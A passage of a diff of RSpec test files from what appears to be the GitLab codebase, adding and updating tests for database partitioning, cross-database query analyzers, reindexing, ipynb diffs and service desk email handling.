Gitlab::Database::Partitioning::PartitionManager do subject(:sync_partitions) { described_class.new(model).sync_partitions } let(:model) { double(partitioning_strategy: partitioning_strategy, table_name: table, connection: connection) } - let(:partitioning_strategy) { double(missing_partitions: partitions, extra_partitions: []) } + let(:partitioning_strategy) { double(missing_partitions: partitions, extra_partitions: [], after_adding_partitions: nil) } let(:connection) { ActiveRecord::Base.connection } let(:table) { "some_table" } @@ -83,7 +83,7 @@ RSpec.describe Gitlab::Database::Partitioning::PartitionManager do let(:manager) { described_class.new(model) } let(:model) { double(partitioning_strategy: partitioning_strategy, table_name: table, connection: connection) } - let(:partitioning_strategy) { double(extra_partitions: extra_partitions, missing_partitions: []) } + let(:partitioning_strategy) { double(extra_partitions: extra_partitions, missing_partitions: [], after_adding_partitions: nil) } let(:connection) { ActiveRecord::Base.connection } let(:table) { "foo" } @@ -101,28 +101,10 @@ RSpec.describe Gitlab::Database::Partitioning::PartitionManager do ] end - context 'with the partition_pruning feature flag enabled' do - before do - stub_feature_flags(partition_pruning: true) - end - - it 'detaches each extra partition' do - extra_partitions.each { |p| expect(manager).to receive(:detach_one_partition).with(p) } - - sync_partitions - end - end + it 'detaches each extra partition' do + extra_partitions.each { |p| expect(manager).to receive(:detach_one_partition).with(p) } - context 'with the partition_pruning feature flag disabled' do - before do - stub_feature_flags(partition_pruning: false) - end - - it 'returns immediately' do - expect(manager).not_to receive(:detach) - - sync_partitions - end + sync_partitions end end diff --git a/spec/lib/gitlab/database/partitioning/single_numeric_list_partition_spec.rb b/spec/lib/gitlab/database/partitioning/single_numeric_list_partition_spec.rb new file mode 100644 index 00000000000..9941241e846 --- /dev/null +++ b/spec/lib/gitlab/database/partitioning/single_numeric_list_partition_spec.rb @@ -0,0 +1,50 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Database::Partitioning::SingleNumericListPartition do + describe '.from_sql' do + subject(:parsed_partition) { described_class.from_sql(table, partition_name, definition) } + + let(:table) { 'partitioned_table' } + let(:partition_value) { 0 } + let(:partition_name) { "partitioned_table_#{partition_value}" } + let(:definition) { "FOR VALUES IN ('#{partition_value}')" } + + it 'uses specified table name' do + expect(parsed_partition.table).to eq(table) + end + + it 'uses specified partition name' do + expect(parsed_partition.partition_name).to eq(partition_name) + end + + it 'parses the definition' do + expect(parsed_partition.value).to eq(partition_value) + end + end + + describe '#partition_name' do + it 'is the explicit name if provided' do + expect(described_class.new('table', 1, partition_name: 'some_other_name').partition_name).to eq('some_other_name') + end + + it 'defaults to the table name followed by the partition value' do + expect(described_class.new('table', 1).partition_name).to eq('table_1') + end + end + + context 'sorting' do + it 'is incomparable if the tables do not match' do + expect(described_class.new('table1', 1) <=> described_class.new('table2', 2)).to be_nil + end + + it 'sorts by the value when the tables match' do + expect(described_class.new('table1', 1) <=> described_class.new('table1', 2)).to eq(1 <=> 2) + end + + it 'sorts by numeric value rather than text value' do + expect(described_class.new('table', 10)).to be > described_class.new('table', 9) + end + end +end diff --git a/spec/lib/gitlab/database/partitioning/sliding_list_strategy_spec.rb b/spec/lib/gitlab/database/partitioning/sliding_list_strategy_spec.rb new file mode 100644 index 00000000000..636a09e5710 --- /dev/null +++ b/spec/lib/gitlab/database/partitioning/sliding_list_strategy_spec.rb @@ -0,0 +1,214 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Database::Partitioning::SlidingListStrategy do + let(:connection) { ActiveRecord::Base.connection } + let(:table_name) { :_test_partitioned_test } + let(:model) { double('model', table_name: table_name, ignored_columns: %w[partition]) } + let(:next_partition_if) { double('next_partition_if') } + let(:detach_partition_if) { double('detach_partition_if') } + + subject(:strategy) do + described_class.new(model, :partition, + next_partition_if: next_partition_if, + detach_partition_if: detach_partition_if) + end + + before do + connection.execute(<<~SQL) + create table #{table_name} + ( + id serial not null, + partition bigint not null default 2, + created_at timestamptz not null, + primary key (id, partition) + ) + partition by list(partition); + + create table #{table_name}_1 + partition of #{table_name} for values in (1); + + create table #{table_name}_2 + partition of #{table_name} for values in (2); + SQL + end + + describe '#current_partitions' do + it 'detects both partitions' do + expect(strategy.current_partitions).to eq([ + Gitlab::Database::Partitioning::SingleNumericListPartition.new(table_name, 1, partition_name: '_test_partitioned_test_1'), + Gitlab::Database::Partitioning::SingleNumericListPartition.new(table_name, 2, partition_name: '_test_partitioned_test_2') + ]) + end + end + + describe '#active_partition' do + it 'is the partition with the largest value' do + expect(strategy.active_partition.value).to eq(2) + end + end + + describe '#missing_partitions' do + context 'when next_partition_if returns true' do + let(:next_partition_if) { proc { true } } + + it 'is a partition definition for the next partition in the series' do + extra = strategy.missing_partitions + + expect(extra.length).to eq(1) + expect(extra.first.value).to eq(3) + end + end + + context 'when next_partition_if returns false' do + let(:next_partition_if) { proc { false } } + + it 'is empty' do + expect(strategy.missing_partitions).to be_empty + end + end + + context 'when there are no partitions for the table' do + it 'returns a partition for value 1' do + connection.execute("drop table #{table_name}_1; drop table #{table_name}_2;") + + missing_partitions = strategy.missing_partitions + + expect(missing_partitions.size).to eq(1) + missing_partition = missing_partitions.first + + expect(missing_partition.value).to eq(1) + end + end + end + + describe '#extra_partitions' do + before do + (3..10).each do |i| + connection.execute("CREATE TABLE #{table_name}_#{i} PARTITION OF #{table_name} FOR VALUES IN (#{i})") + end + end + + context 'when some partitions are true for detach_partition_if' do + let(:detach_partition_if) { ->(p) { p != 5 } } + + it 'is the leading set of partitions before that value' do + expect(strategy.extra_partitions.map(&:value)).to contain_exactly(1, 2, 3, 4) + end + end + + context 'when all partitions are true for detach_partition_if' do + let(:detach_partition_if) { proc { true } } + + it 'is all but the most recent partition', :aggregate_failures do + expect(strategy.extra_partitions.map(&:value)).to contain_exactly(1, 2, 3, 4, 5, 6, 7, 8, 9) + + expect(strategy.current_partitions.map(&:value).max).to eq(10) + end + end + end + + describe '#initial_partition' do + it 'starts with the value 1', :aggregate_failures do + initial_partition = strategy.initial_partition + expect(initial_partition.value).to eq(1) + expect(initial_partition.table).to eq(strategy.table_name) + expect(initial_partition.partition_name).to eq("#{strategy.table_name}_1") + end + end + + describe '#next_partition' do + it 'is one after the active partition', :aggregate_failures do + expect(strategy).to receive(:active_partition).and_return(double(value: 5)) + next_partition = strategy.next_partition + + expect(next_partition.value).to eq(6) + expect(next_partition.table).to eq(strategy.table_name) + expect(next_partition.partition_name).to eq("#{strategy.table_name}_6") + end + end + + describe '#ensure_partitioning_column_ignored!' do + it 'raises when the column is not ignored' do + expect do + Class.new(ApplicationRecord) do + include PartitionedTable + + partitioned_by :partition, strategy: :sliding_list, + next_partition_if: proc { false }, + detach_partition_if: proc { false } + end + end.to raise_error(/ignored_columns/) + end + + it 'does not raise when the column is ignored' do + expect do + Class.new(ApplicationRecord) do + include PartitionedTable + + self.ignored_columns = [:partition] + + partitioned_by :partition, strategy: :sliding_list, + next_partition_if: proc { false }, + detach_partition_if: proc { false } + end + end.not_to raise_error + end + end + context 'redirecting inserts as the active partition changes' do + let(:model) do + Class.new(ApplicationRecord) do + include PartitionedTable + + self.table_name = '_test_partitioned_test' + self.primary_key = :id + + self.ignored_columns = %w[partition] + + # method().call cannot be detected by rspec, so we add a layer of indirection here + def self.next_partition_if_wrapper(...) + next_partition?(...) + end + + def self.detach_partition_if_wrapper(...) + detach_partition?(...) + end + partitioned_by :partition, strategy: :sliding_list, + next_partition_if: method(:next_partition_if_wrapper), + detach_partition_if: method(:detach_partition_if_wrapper) + + def self.next_partition?(current_partition) + end + + def self.detach_partition?(partition) + end + end + end + + it 'redirects to the new partition', :aggregate_failures do + partition_2_model = model.create! # Goes in partition 2 + + allow(model).to receive(:next_partition?) do + model.partitioning_strategy.active_partition.value < 3 + end + + allow(model).to receive(:detach_partition?).and_return(false) + + Gitlab::Database::Partitioning::PartitionManager.new(model).sync_partitions + + partition_3_model = model.create! + + # Rails doesn't pick up on database default changes, so we need to reload + # We also want to grab the partition column to verify what it was set to. + # In normal operation we make rails ignore it so that we can use a changing default + # So we force select * to load it + all_columns = model.select(model.arel_table[Arel.star]) + partition_2_model = all_columns.find(partition_2_model.id) + partition_3_model = all_columns.find(partition_3_model.id) + + expect(partition_2_model.partition).to eq(2) + expect(partition_3_model.partition).to eq(3) + end + end +end diff --git a/spec/lib/gitlab/database/query_analyzer_spec.rb b/spec/lib/gitlab/database/query_analyzer_spec.rb index 82a1c7143d5..34c72893c53 100644 --- a/spec/lib/gitlab/database/query_analyzer_spec.rb +++ b/spec/lib/gitlab/database/query_analyzer_spec.rb @@ -128,11 +128,20 @@ RSpec.describe Gitlab::Database::QueryAnalyzer, query_analyzers: false do it 'does not call analyze on suppressed analyzers' do expect(analyzer).to receive(:suppressed?).and_return(true) + expect(analyzer).to receive(:requires_tracking?).and_return(false) expect(analyzer).not_to receive(:analyze) expect { process_sql("SELECT 1 FROM projects") }.not_to raise_error end + it 'does call analyze on suppressed analyzers if some queries require tracking' do + expect(analyzer).to receive(:suppressed?).and_return(true) + expect(analyzer).to receive(:requires_tracking?).and_return(true) + expect(analyzer).to receive(:analyze) + + expect { process_sql("SELECT 1 FROM projects") }.not_to raise_error + end + def process_sql(sql) described_class.instance.within do ApplicationRecord.load_balancer.read_write do |connection| diff --git a/spec/lib/gitlab/database/query_analyzers/gitlab_schemas_metrics_spec.rb b/spec/lib/gitlab/database/query_analyzers/gitlab_schemas_metrics_spec.rb index ab5f05e3ec4..86e74cf5177 100644 --- a/spec/lib/gitlab/database/query_analyzers/gitlab_schemas_metrics_spec.rb +++ b/spec/lib/gitlab/database/query_analyzers/gitlab_schemas_metrics_spec.rb @@ -17,7 +17,7 @@ RSpec.describe Gitlab::Database::QueryAnalyzers::GitlabSchemasMetrics, query_ana process_sql(ActiveRecord::Base, "SELECT 1 FROM projects") end - context 'properly observes all queries', :mocked_ci_connection do + context 'properly observes all queries', :add_ci_connection do using RSpec::Parameterized::TableSyntax where do diff --git a/spec/lib/gitlab/database/query_analyzers/prevent_cross_database_modification_spec.rb b/spec/lib/gitlab/database/query_analyzers/prevent_cross_database_modification_spec.rb index eb8ccb0bd89..c41b4eeea10 100644 --- a/spec/lib/gitlab/database/query_analyzers/prevent_cross_database_modification_spec.rb +++ b/spec/lib/gitlab/database/query_analyzers/prevent_cross_database_modification_spec.rb @@ -92,6 +92,23 @@ RSpec.describe Gitlab::Database::QueryAnalyzers::PreventCrossDatabaseModificatio end end end + + context 'when comments are added to the front of query strings' do + around do |example| + prepend_comment_was = Marginalia::Comment.prepend_comment + Marginalia::Comment.prepend_comment = true + + example.run + + Marginalia::Comment.prepend_comment = prepend_comment_was + end + + it 'raises error' do + Project.transaction do + expect { run_queries }.to raise_error /Cross-database data modification/ + end + end + end end context 'when executing a SELECT FOR UPDATE query' do @@ -164,4 +181,49 @@ RSpec.describe Gitlab::Database::QueryAnalyzers::PreventCrossDatabaseModificatio end.to raise_error /Cross-database data modification.*The gitlab_schema was undefined/ end end + + context 'when execution is rescued with StandardError' do + it 'raises cross-database data modification exception' do + expect do + Project.transaction do + project.touch + project.connection.execute('UPDATE foo_bars_undefined_table SET a=1 WHERE id = -1') + end + rescue StandardError + # Ensures that standard rescue does not silence errors + end.to raise_error /Cross-database data modification.*The gitlab_schema was undefined/ + end + end + + context 'when uniquiness validation is tested', type: :model do + subject { build(:ci_variable) } + + it 'does not raise exceptions' do + expect do + is_expected.to validate_uniqueness_of(:key).scoped_to(:project_id, :environment_scope).with_message(/\(\w+\) has already been taken/) + end.not_to raise_error + end + end + + context 'when doing rollback in a suppressed block' do + it 'does not raise misaligned transactions exception' do + expect do + # This is non-materialised transaction: + # 1. the transaction will be open on a write (project.touch) (in a suppressed block) + # 2. the rescue will be handled outside of suppressed block + # + # This will create misaligned boundaries since BEGIN + # of transaction will be executed within a suppressed block + Project.transaction do + described_class.with_suppressed do + project.touch + + raise 'force rollback' + end + + # the ensure of `.transaction` executes `ROLLBACK TO SAVEPOINT` + end + end.to raise_error /force rollback/ + end + end end diff --git a/spec/lib/gitlab/database/reindexing/coordinator_spec.rb b/spec/lib/gitlab/database/reindexing/coordinator_spec.rb index 085fd3061ad..0afbe46b7f1 100644 --- a/spec/lib/gitlab/database/reindexing/coordinator_spec.rb +++ b/spec/lib/gitlab/database/reindexing/coordinator_spec.rb @@ -15,10 +15,18 @@ RSpec.describe Gitlab::Database::Reindexing::Coordinator do let(:action) { create(:reindex_action, index: index) } let!(:lease) { stub_exclusive_lease(lease_key, uuid, timeout: lease_timeout) } - let(:lease_key) { 'gitlab/database/reindexing/coordinator' } + let(:lease_key) { "gitlab/database/reindexing/coordinator/#{Gitlab::Database::PRIMARY_DATABASE_NAME}" } let(:lease_timeout) { 1.day } let(:uuid) { 'uuid' } + around do |example| + model = Gitlab::Database.database_base_models[Gitlab::Database::PRIMARY_DATABASE_NAME] + + Gitlab::Database::SharedModel.using_connection(model.connection) do + example.run + end + end + before do swapout_view_for_table(:postgres_indexes) diff --git a/spec/lib/gitlab/database/reindexing_spec.rb b/spec/lib/gitlab/database/reindexing_spec.rb index 13aff343432..0c576505e07 100644 --- a/spec/lib/gitlab/database/reindexing_spec.rb +++ b/spec/lib/gitlab/database/reindexing_spec.rb @@ -6,6 +6,63 @@ RSpec.describe Gitlab::Database::Reindexing do include ExclusiveLeaseHelpers include Database::DatabaseHelpers + describe '.invoke' do + let(:databases) { Gitlab::Database.database_base_models } + let(:databases_count) { databases.count } + + it 'cleans up any leftover indexes' do + expect(described_class).to receive(:cleanup_leftovers!).exactly(databases_count).times + + described_class.invoke + end + + context 'when there is an error raised' do + it 'logs and re-raise' do + expect(described_class).to receive(:automatic_reindexing).and_raise('Unexpected!') + expect(Gitlab::AppLogger).to receive(:error) + + expect { described_class.invoke }.to raise_error('Unexpected!') + end + end + + context 'when async index creation is enabled' do + it 'executes async index creation prior to any reindexing actions' do + stub_feature_flags(database_async_index_creation: true) + + expect(Gitlab::Database::AsyncIndexes).to receive(:create_pending_indexes!).ordered.exactly(databases_count).times + expect(described_class).to receive(:automatic_reindexing).ordered.exactly(databases_count).times + + described_class.invoke + end + end + + context 'when async index creation is disabled' do + it 'does not execute async index creation' do + stub_feature_flags(database_async_index_creation: false) + + expect(Gitlab::Database::AsyncIndexes).not_to receive(:create_pending_indexes!) + + described_class.invoke + end + end + + context 'calls automatic reindexing' do + it 'uses all candidate indexes' do + expect(described_class).to receive(:automatic_reindexing).exactly(databases_count).times + + described_class.invoke + end + + context 'when explicit database is given' do + it 'skips other databases' do + expect(described_class).to receive(:automatic_reindexing).once + + described_class.invoke(Gitlab::Database::PRIMARY_DATABASE_NAME) + end + end + end + end + describe '.automatic_reindexing' do subject { described_class.automatic_reindexing(maximum_records: limit) } @@ -133,10 +190,19 @@ RSpec.describe Gitlab::Database::Reindexing do end describe '.cleanup_leftovers!' do - subject { described_class.cleanup_leftovers! } + subject(:cleanup_leftovers) { described_class.cleanup_leftovers! } + + let(:model) { Gitlab::Database.database_base_models[Gitlab::Database::PRIMARY_DATABASE_NAME] } + let(:connection) { model.connection } + + around do |example| + Gitlab::Database::SharedModel.using_connection(connection) do + example.run + end + end before do - ApplicationRecord.connection.execute(<<~SQL) + connection.execute(<<~SQL) CREATE INDEX foobar_ccnew ON users (id); CREATE INDEX foobar_ccnew1 ON users (id); SQL @@ -150,11 +216,11 @@ RSpec.describe Gitlab::Database::Reindexing do expect_query("DROP INDEX CONCURRENTLY IF EXISTS \"public\".\"foobar_ccnew1\"") expect_query("RESET idle_in_transaction_session_timeout; RESET lock_timeout") - subject + cleanup_leftovers end def expect_query(sql) - expect(ApplicationRecord.connection).to receive(:execute).ordered.with(sql).and_wrap_original do |method, sql| + expect(connection).to receive(:execute).ordered.with(sql).and_wrap_original do |method, sql| method.call(sql.sub(/CONCURRENTLY/, '')) end end diff --git a/spec/lib/gitlab/database/shared_model_spec.rb b/spec/lib/gitlab/database/shared_model_spec.rb index 94f2b5a3434..54af4a0c4dc 100644 --- a/spec/lib/gitlab/database/shared_model_spec.rb +++ b/spec/lib/gitlab/database/shared_model_spec.rb @@ -84,4 +84,16 @@ RSpec.describe Gitlab::Database::SharedModel do expect(described_class.connection).to be(original_connection) end end + + describe '#connection_db_config' do + it 'returns the class connection_db_config' do + shared_model_class = Class.new(described_class) do + self.table_name = 'postgres_async_indexes' + end + + shared_model = shared_model_class.new + + expect(shared_model.connection_db_config). to eq(described_class.connection_db_config) + end + end end diff --git a/spec/lib/gitlab/database/type/json_pg_safe_spec.rb b/spec/lib/gitlab/database/type/json_pg_safe_spec.rb new file mode 100644 index 00000000000..91dc6f39aa7 --- /dev/null +++ b/spec/lib/gitlab/database/type/json_pg_safe_spec.rb @@ -0,0 +1,26 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Database::Type::JsonPgSafe do + let(:type) { described_class.new } + + describe '#serialize' do + using RSpec::Parameterized::TableSyntax + + subject { type.serialize(value) } + + where(:value, :json) do + nil | nil + 1 | '1' + 1.0 | '1.0' + "str\0ing\u0000" | '"string"' + ["\0arr", "a\u0000y"] | '["arr","ay"]' + { "key\0" => "value\u0000\0" } | '{"key":"value"}' + end + + with_them do + it { is_expected.to eq(json) } + end + end +end diff --git a/spec/lib/gitlab/diff/custom_diff_spec.rb b/spec/lib/gitlab/diff/custom_diff_spec.rb new file mode 100644 index 00000000000..246508d2e1e --- /dev/null +++ b/spec/lib/gitlab/diff/custom_diff_spec.rb @@ -0,0 +1,62 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Diff::CustomDiff do + include RepoHelpers + + let(:project) { create(:project, :repository) } + let(:repository) { project.repository } + let(:ipynb_blob) { repository.blob_at('f6b7a707', 'files/ipython/markdown-table.ipynb') } + let(:blob) { repository.blob_at('HEAD', 'files/ruby/regex.rb') } + + describe '#preprocess_before_diff' do + context 'for ipynb files' do + it 'transforms the diff' do + expect(described_class.preprocess_before_diff(ipynb_blob.path, nil, ipynb_blob)).not_to include('cells') + end + + it 'adds the blob to the list of transformed blobs' do + described_class.preprocess_before_diff(ipynb_blob.path, nil, ipynb_blob) + + expect(described_class.transformed_for_diff?(ipynb_blob)).to be_truthy + end + end + + context 'for other files' do + it 'returns nil' do + expect(described_class.preprocess_before_diff(blob.path, nil, blob)).to be_nil + end + + it 'does not add the blob to the list of transformed blobs' do + described_class.preprocess_before_diff(blob.path, nil, blob) + + expect(described_class.transformed_for_diff?(blob)).to be_falsey + end + end + end + + describe '#transformed_blob_data' do + it 'transforms blob data if file was processed' do + described_class.preprocess_before_diff(ipynb_blob.path, nil, ipynb_blob) + + expect(described_class.transformed_blob_data(ipynb_blob)).not_to include('cells') + end + + it 'does not transform blob data if file was not processed' do + expect(described_class.transformed_blob_data(ipynb_blob)).to be_nil + end + end + + describe '#transformed_blob_language' do + it 'is md when file was preprocessed' do + described_class.preprocess_before_diff(ipynb_blob.path, nil, ipynb_blob) + + expect(described_class.transformed_blob_language(ipynb_blob)).to eq('md') + end + + it 'is nil for a .ipynb blob that was not preprocessed' do + expect(described_class.transformed_blob_language(ipynb_blob)).to be_nil + end + end +end diff --git a/spec/lib/gitlab/diff/file_spec.rb b/spec/lib/gitlab/diff/file_spec.rb index 4b437397688..45a49a36fe2 100644 --- a/spec/lib/gitlab/diff/file_spec.rb +++ b/spec/lib/gitlab/diff/file_spec.rb @@ -53,7 +53,7 @@ RSpec.describe Gitlab::Diff::File do describe 'initialize' do context 'when file is ipynb with a change after transformation' do - let(:commit) { project.commit("f6b7a707") } + let(:commit) { project.commit("532c837") } let(:diff) { commit.raw_diffs.first } let(:diff_file) { described_class.new(diff, diff_refs: commit.diff_refs, repository: project.repository) } @@ -63,7 +63,7 @@ RSpec.describe Gitlab::Diff::File do end it 'recreates the diff by transforming the files' do - expect(diff_file.diff.diff).not_to include('"| Fake') + expect(diff_file.diff.diff).not_to include('cell_type') end end @@ -73,7 +73,7 @@ RSpec.describe Gitlab::Diff::File do end it 'does not recreate the diff' do - expect(diff_file.diff.diff).to include('"| Fake') + expect(diff_file.diff.diff).to include('cell_type') end end end diff --git a/spec/lib/gitlab/diff/highlight_spec.rb b/spec/lib/gitlab/diff/highlight_spec.rb index 94b28c38fa2..624160d2f48 100644 --- a/spec/lib/gitlab/diff/highlight_spec.rb +++ b/spec/lib/gitlab/diff/highlight_spec.rb @@ -151,20 +151,6 @@ RSpec.describe Gitlab::Diff::Highlight do expect(subject[2].rich_text).to eq(%Q{ <span id="LC7" class="line" lang=""> def popen(cmd, path=nil)</span>\n}) expect(subject[2].rich_text).to be_html_safe end - - context 'when limited_diff_highlighting is disabled' do - before do - stub_feature_flags(limited_diff_highlighting: false) - stub_feature_flags(diff_line_syntax_highlighting: false) - end - - it 'blobs are highlighted as plain text with loading all data' do - expect(diff_file.blob).to receive(:load_all_data!).twice - - code = %Q{ <span id="LC7" class="line" lang=""> def popen(cmd, path=nil)</span>\n} - expect(subject[2].rich_text).to eq(code) - end - end end end end diff --git a/spec/lib/gitlab/email/handler/create_issue_handler_spec.rb b/spec/lib/gitlab/email/handler/create_issue_handler_spec.rb index bd4f1d164a8..10098a66ae9 100644 --- a/spec/lib/gitlab/email/handler/create_issue_handler_spec.rb +++ b/spec/lib/gitlab/email/handler/create_issue_handler_spec.rb @@ -101,6 +101,17 @@ RSpec.describe Gitlab::Email::Handler::CreateIssueHandler do end end + context 'when all lines of email are quotes' do + let(:email_raw) { email_fixture('emails/valid_new_issue_with_only_quotes.eml') } + + it 'creates email with correct body' do + receiver.execute + + issue = Issue.last + expect(issue.description).to include('This email has been forwarded without new content.') + end + end + context "something is wrong" do context "when the issue could not be saved" do before do diff --git a/spec/lib/gitlab/email/handler/service_desk_handler_spec.rb b/spec/lib/gitlab/email/handler/service_desk_handler_spec.rb index c579027788d..7c34fb1a926 100644 --- a/spec/lib/gitlab/email/handler/service_desk_handler_spec.rb +++ b/spec/lib/gitlab/email/handler/service_desk_handler_spec.rb @@ -12,6 +12,8 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do let(:email_raw) { email_fixture('emails/service_desk.eml') } let(:author_email) { 'jake@adventuretime.ooo' } + let(:message_id) { 'CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com' } + let_it_be(:group) { create(:group, :private, name: "email") } let(:expected_description) do @@ -40,6 +42,7 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do expect(new_issue.all_references.all).to be_empty expect(new_issue.title).to eq("The message subject! @all") expect(new_issue.description).to eq(expected_description.strip) + expect(new_issue.email&.email_message_id).to eq(message_id) end it 'creates an issue_email_participant' do @@ -72,6 +75,95 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do it_behaves_like 'a new issue request' end + context 'when replying to issue creation email' do + def receive_reply + reply_email_raw = email_fixture('emails/service_desk_reply.eml') + + second_receiver = Gitlab::Email::Receiver.new(reply_email_raw) + second_receiver.execute + end + + context 'when an issue with message_id has been found' do + before do + receiver.execute + end + + subject do + receive_reply + end + + it 'does not create an additional issue' do + expect { subject }.not_to change { Issue.count } + end + + it 'adds a comment to the created issue' do + subject + + notes = Issue.last.notes + new_note = notes.first + + expect(notes.count).to eq(1) + expect(new_note.note).to eq("Service desk reply!\n\n`/label ~label2`") + expect(new_note.author).to eql(User.support_bot) + end + + it 'does not send thank you email' do + expect(Notify).not_to receive(:service_desk_thank_you_email) + + subject + end + + context 'when issue_email_participants FF is enabled' do + it 'creates 2 issue_email_participants' do + subject + + expect(Issue.last.issue_email_participants.map(&:email)) + .to match_array(%w(alan@adventuretime.ooo jake@adventuretime.ooo)) + end + end + + context 'when issue_email_participants FF is disabled' do + before do + stub_feature_flags(issue_email_participants: false) + end + + it 'creates only 1 issue_email_participant' do + subject + + expect(Issue.last.issue_email_participants.map(&:email)) + .to match_array(%w(jake@adventuretime.ooo)) + end + end + end + + context 'when an issue with message_id has not been found' do + subject do + receive_reply + end + + it 'creates a new issue correctly' do + expect { subject }.to change { Issue.count }.by(1) + + issue = Issue.last + + expect(issue.description).to eq("Service desk reply!\n\n`/label ~label2`") + end + + it 'sends thank you email once' do + expect(Notify).to receive(:service_desk_thank_you_email).once.and_return(double(deliver_later: true)) + + subject + end + + it 'creates 1 issue_email_participant' do + subject + + expect(Issue.last.issue_email_participants.map(&:email)) + .to match_array(%w(alan@adventuretime.ooo)) + end + end + end + context 'when using issue templates' do let_it_be(:user) { create(:user) } @@ -270,6 +362,20 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do end end + context 'when issue email creation fails' do + before do + allow(::Issue::Email).to receive(:create!).and_raise(StandardError) + end + + it 'still creates a new issue' do + expect { receiver.execute }.to change { Issue.count }.by(1) + end + + it 'does not create issue email record' do + expect { receiver.execute }.not_to change { Issue::Email.count } + end + end + context 'when rate limiting is in effect', :freeze_time, :clean_gitlab_redis_rate_limiting do let(:receiver) { Gitlab::Email::Receiver.new(email_raw) } @@ -291,19 +397,19 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do rescue RateLimitedService::RateLimitedError end.to change { Issue.count }.by(1) end + end - context 'when requests are sent by different users' do - let(:email_raw_2) { email_fixture('emails/service_desk_forwarded.eml') } - let(:receiver2) { Gitlab::Email::Receiver.new(email_raw_2) } + context 'when requests are sent by different users' do + let(:email_raw_2) { email_fixture('emails/service_desk_forwarded.eml') } + let(:receiver2) { Gitlab::Email::Receiver.new(email_raw_2) } - subject do - receiver.execute - receiver2.execute - end + subject do + receiver.execute + receiver2.execute + end - it 'creates 2 issues' do - expect { subject }.to change { Issue.count }.by(2) - end + it 'creates 2 issues' do + expect { subject }.to change { Issue.count }.by(2) end end @@ -389,6 +495,7 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do context 'when the email is forwarded through an alias' do let(:author_email) { 'jake.g@adventuretime.ooo' } let(:email_raw) { email_fixture('emails/service_desk_forwarded.eml') } + let(:message_id) { 'CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=fdskbsf@mail.gmail.com' } it_behaves_like 'a new issue request' end diff --git a/spec/lib/gitlab/email/hook/smime_signature_interceptor_spec.rb b/spec/lib/gitlab/email/hook/smime_signature_interceptor_spec.rb index 352eb596cd9..7dd4ee7e25d 100644 --- a/spec/lib/gitlab/email/hook/smime_signature_interceptor_spec.rb +++ b/spec/lib/gitlab/email/hook/smime_signature_interceptor_spec.rb @@ -50,6 +50,7 @@ RSpec.describe Gitlab::Email::Hook::SmimeSignatureInterceptor do expect(mail.header['To'].value).to eq('test@example.com') expect(mail.header['From'].value).to eq('info@example.com') expect(mail.header['Content-Type'].value).to match('multipart/signed').and match('protocol="application/x-pkcs7-signature"') + expect(mail.header.include?('Content-Disposition')).to eq(false) # verify signature and obtain pkcs7 encoded content p7enc = Gitlab::Email::Smime::Signer.verify_signature( diff --git a/spec/lib/gitlab/email/service_desk_receiver_spec.rb b/spec/lib/gitlab/email/service_desk_receiver_spec.rb index 6ba58ad5e93..49cbec6fffc 100644 --- a/spec/lib/gitlab/email/service_desk_receiver_spec.rb +++ b/spec/lib/gitlab/email/service_desk_receiver_spec.rb @@ -9,9 +9,7 @@ RSpec.describe Gitlab::Email::ServiceDeskReceiver do context 'when the email contains a valid email address' do before do stub_service_desk_email_setting(enabled: true, address: 'support+%{key}@example.com') - end - it 'finds the service desk key' do handler = double(execute: true, metrics_event: true, metrics_params: true) expected_params = [ an_instance_of(Mail::Message), nil, @@ -20,8 +18,38 @@ RSpec.describe Gitlab::Email::ServiceDeskReceiver do expect(Gitlab::Email::Handler::ServiceDeskHandler) .to receive(:new).with(*expected_params).and_return(handler) + end + + context 'when in a To header' do + it 'finds the service desk key' do + receiver.execute + end + end + + context 'when the email contains a valid email address in a header' do + context 'when in a Delivered-To header' do + let(:email) { fixture_file('emails/service_desk_custom_address_reply.eml') } + + it 'finds the service desk key' do + receiver.execute + end + end + + context 'when in a Envelope-To header' do + let(:email) { fixture_file('emails/service_desk_custom_address_envelope_to.eml') } + + it 'finds the service desk key' do + receiver.execute + end + end + + context 'when in a X-Envelope-To header' do + let(:email) { fixture_file('emails/service_desk_custom_address_x_envelope_to.eml') } - receiver.execute + it 'finds the service desk key' do + receiver.execute + end + end end end diff --git a/spec/lib/gitlab/empty_search_results_spec.rb b/spec/lib/gitlab/empty_search_results_spec.rb new file mode 100644 index 00000000000..e79586bef68 --- /dev/null +++ b/spec/lib/gitlab/empty_search_results_spec.rb @@ -0,0 +1,31 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::EmptySearchResults do + subject { described_class.new } + + describe '#objects' do + it 'returns an empty array' do + expect(subject.objects).to match_array([]) + end + end + + describe '#formatted_count' do + it 'returns a zero' do + expect(subject.formatted_count).to eq('0') + end + end + + describe '#highlight_map' do + it 'returns an empty hash' do + expect(subject.highlight_map).to eq({}) + end + end + + describe '#aggregations' do + it 'returns an empty array' do + expect(subject.objects).to match_array([]) + end + end +end diff --git a/spec/lib/gitlab/error_tracking_spec.rb b/spec/lib/gitlab/error_tracking_spec.rb index 7ad1f52780a..a5d44963f4b 100644 --- a/spec/lib/gitlab/error_tracking_spec.rb +++ b/spec/lib/gitlab/error_tracking_spec.rb @@ -205,16 +205,6 @@ RSpec.describe Gitlab::ErrorTracking do expect(sentry_event.dig('extra', 'sql')).to eq('SELECT "users".* FROM "users" WHERE "users"."id" = $2 AND "users"."foo" = $1') end end - - context 'when the `ActiveRecord::StatementInvalid` is wrapped in another exception' do - it 'injects the normalized sql query into extra' do - allow(exception).to receive(:cause).and_return(ActiveRecord::StatementInvalid.new(sql: 'SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."foo" = $1')) - - track_exception - - expect(sentry_event.dig('extra', 